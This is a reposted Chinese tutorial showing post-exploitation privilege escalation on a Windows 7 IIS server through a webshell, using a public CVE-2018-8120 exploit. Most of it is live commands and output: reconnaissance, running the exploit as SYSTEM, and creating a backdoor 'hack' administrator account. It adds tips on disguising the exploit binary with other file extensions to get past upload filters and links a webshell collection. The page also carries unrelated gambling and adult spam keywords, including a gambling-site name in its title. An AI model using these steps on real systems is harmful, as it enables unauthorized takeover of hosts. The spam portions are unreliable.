安基網 首頁 資訊 安全報 查看內容

X雪缘园:Win7本地溢出exploit提權-CVE-2018-8120

英超雪缘园 www.trual.com.cn 2020-2-9 15:28| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 這邊是模擬拿到了一個WebShell的后滲透提權操作提權過程首先是看了看一個當前用戶權限:C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1是一個IIS的普通權限C:inetpubwwwrootbjgs_v2.1> net user 的用戶帳戶------------------------------------------------------ ...

轉載: saulGoodman

前言

這邊是模擬拿到了一個WebShell的后滲透提權操作

提權過程

首先是看了看一個當前用戶權限:

C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1

是一個IIS的普通權限

C:inetpubwwwrootbjgs_v2.1> net user 的用戶帳戶-------------------------------------------------------------------------------Administrator            Guest                    liuwx                    命令運行完畢,但發生一個或多個錯誤。C:inetpubwwwrootbjgs_v2.1> net user admin admin /add發生系統錯誤 5。拒絕訪問。C:inetpubwwwrootbjgs_v2.1>

創建用戶:拒絕訪問,那么權限還是比較低的!

先是上傳個大馬看看有沒有可讀可寫的目錄:

得到一個目錄:

文件夾:C:inetpubwwwrootbjgs_v2.1 可讀,可寫。

先看看當前主機的信息:

C:inetpubwwwrootbjgs_v2.1> systeminfo主機名:           LIUWX-PCOS 名稱:          Microsoft Windows 7 旗艦版 OS 版本:          6.1.7601 Service Pack 1 Build 7601OS 制造商:        Microsoft CorporationOS 配置:          獨立工作站OS 構件類型:      Multiprocessor Free注冊的所有人:     liuwx注冊的組織:       產品 ID:          00426-292-0000007-85837初始安裝日期:     2019/4/16, 1:03:42系統啟動時間:     2019/10/7, 9:39:32系統制造商:       VMware, Inc.系統型號:         VMware Virtual Platform系統類型:         x64-based PC處理器:           安裝了 2 個處理器。                  [01]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 Mhz                  [02]: Intel64 Family 6 Model 158 Stepping 9 GenuineIntel ~3408 MhzBIOS 版本:        Phoenix Technologies LTD 6.00, 2017/5/19Windows 目錄:     C:Windows系統目錄:         C:Windowssystem32啟動設備:         DeviceHarddiskVolume1系統區域設置:     zh-cn;中文(中國)輸入法區域設置:   zh-cn;中文(中國)時區:             (UTC+08:00)北京,重慶,香港特別行政區,烏魯木齊物理內存總量:     3,103 MB可用的物理內存:   1,834 MB虛擬內存: 最大值: 6,205 MB虛擬內存: 可用:   4,956 MB虛擬內存: 使用中: 1,249 MB頁面文件位置:     C:pagefile.sys域:               WORKGROUP登錄服務器:       暫缺修補程序:         安裝了 2 個修補程序。                  [01]: KB2534111                  [02]: KB976902網卡:             安裝了 1 個 NIC。                  [01]: Intel(R) PRO/1000 MT Network Connection                      連接名:      本地連接                      啟用 DHCP:   是                      DHCP 服務器: 192.168.1.1                      IP 地址                        [01]: 192.168.1.106                        [02]: fe80::10d5:df24:e351:af59C:inetpubwwwrootbjgs_v2.1>


關鍵信息有:

操作系統是Windows 7 x64補丁只打了兩個:KB2534111、KB976902

那么我們就可以上傳*.exe本地溢出提權!

這邊是在Github上找到了一個提權exe: https://github.com/alpha1ab/CVE-2018-8120


吧exe上傳到可讀可寫的目錄:

先是使用exe看了看當前權限:

[*] 磁盤列表 [ C:D: ]C:inetpubwwwrootbjgs_v2.1> whoamiiis apppoolbjgs_v2.1C:inetpubwwwrootbjgs_v2.1> C:inetpubwwwrootbjgs_v2.1> CVE-2018-8120.exe "whoami"CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.[+] Trying to execute whoami as SYSTEM...[+] Process created with pid 3132!nt authoritysystemC:inetpubwwwrootbjgs_v2.1>


是一個:nt authoritysystem系統權限!

提權命令:(創建一個hack用戶并且提升為管理員組)

CVE-2018-8120.exe "net user hack hack /add"CVE-2018-8120.exe "net localgroup administrators hack /add"


C:inetpubwwwrootbjgs_v2.1> net user 的用戶帳戶-------------------------------------------------------------------------------Administrator            Guest                    hack                     liuwx                    命令運行完畢,但發生一個或多個錯誤。C:inetpubwwwrootbjgs_v2.1> net user hack用戶名                 hack全名                   注釋                   用戶的注釋             國家/地區代碼          000 (系統默認值)帳戶啟用               Yes帳戶到期               從不上次設置密碼           2019/10/7 11:04:04密碼到期               2019/11/18 11:04:04密碼可更改             2019/10/7 11:04:04需要密碼               Yes用戶可以更改密碼       Yes允許的工作站           All登錄腳本               用戶配置文件           主目錄                 上次登錄               從不可允許的登錄小時數     All本地組成員             *Administrators       全局組成員             *None                 命令成功完成。

提權成功!

番外篇

二進制文件后綴可任意修改

首先我們是有一個二進制文件:CVE-2018-8120.exe

接著吧exe后綴改成txt

CVE-2018-8120.txt “whoami”

C:inetpubwwwrootbjgs_v2.1> CVE-2018-8120.txt "whoami"CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab)[-] Could not load ntkrnlmp.exe , load ntoskrnl.exe instead.[+] Trying to execute whoami as SYSTEM...[+] Process created with pid 2700!nt authoritysystem

可以看到,是可以執行的!

一般這種用于不能上傳exe、bat文件,我們就可以吧exe文件修改為可上傳的后綴文件也能照常運行!

圖片格式也是可以的!

aspx比asp權限大

如果網站支持aspx腳本,那么有的時候asp的權限比較小,但是上傳了aspx腳本后權限就比asp要大一些!

因為aspx使用的是.net技術。IIS 中默認不支持,ASPX需要依賴于.net framework …ASP只是腳本語言而已。ASP.NET允許用戶使用IIS建立網絡服務。入侵的時候…asp的木馬一般是guest權限…APSX的木馬一般是users權限…iis6默認以network service身份運行。iis5默認是aspnet ASP.NET,IIS的權限機制非常復雜,對每一層應用,都有不同的權限控制。總之..要求對asp.net開放相應權限,才可以讓你的網站完成相應的服務。ASP.net程序的訪問權限由ASPNET的權限來決定。ASPNET隸屬于Users組。所以ASPX權限就要高一些…

WebSHELL集合 : https://github.com/tennc/webshell



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/i6791279542125199884/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao} 并木优全部作品番号 北京十一选五一定有 欧美av女演员照片 浙江快乐十二选五一定牛 澳洲幸运5稳定计划app 福彩排列7开奖走势图 18日世界杯比分预测 广西快乐十分基本走势图彩经网 极速飞艇pk10送彩金 黑龙江数字6十1开奖 宫前幸恵 乌鲁木齐按摩休闲 2013年最新漂亮的av女优排行榜 疯狂飞艇app 燕赵河北排五开奖结果 内蒙古时时彩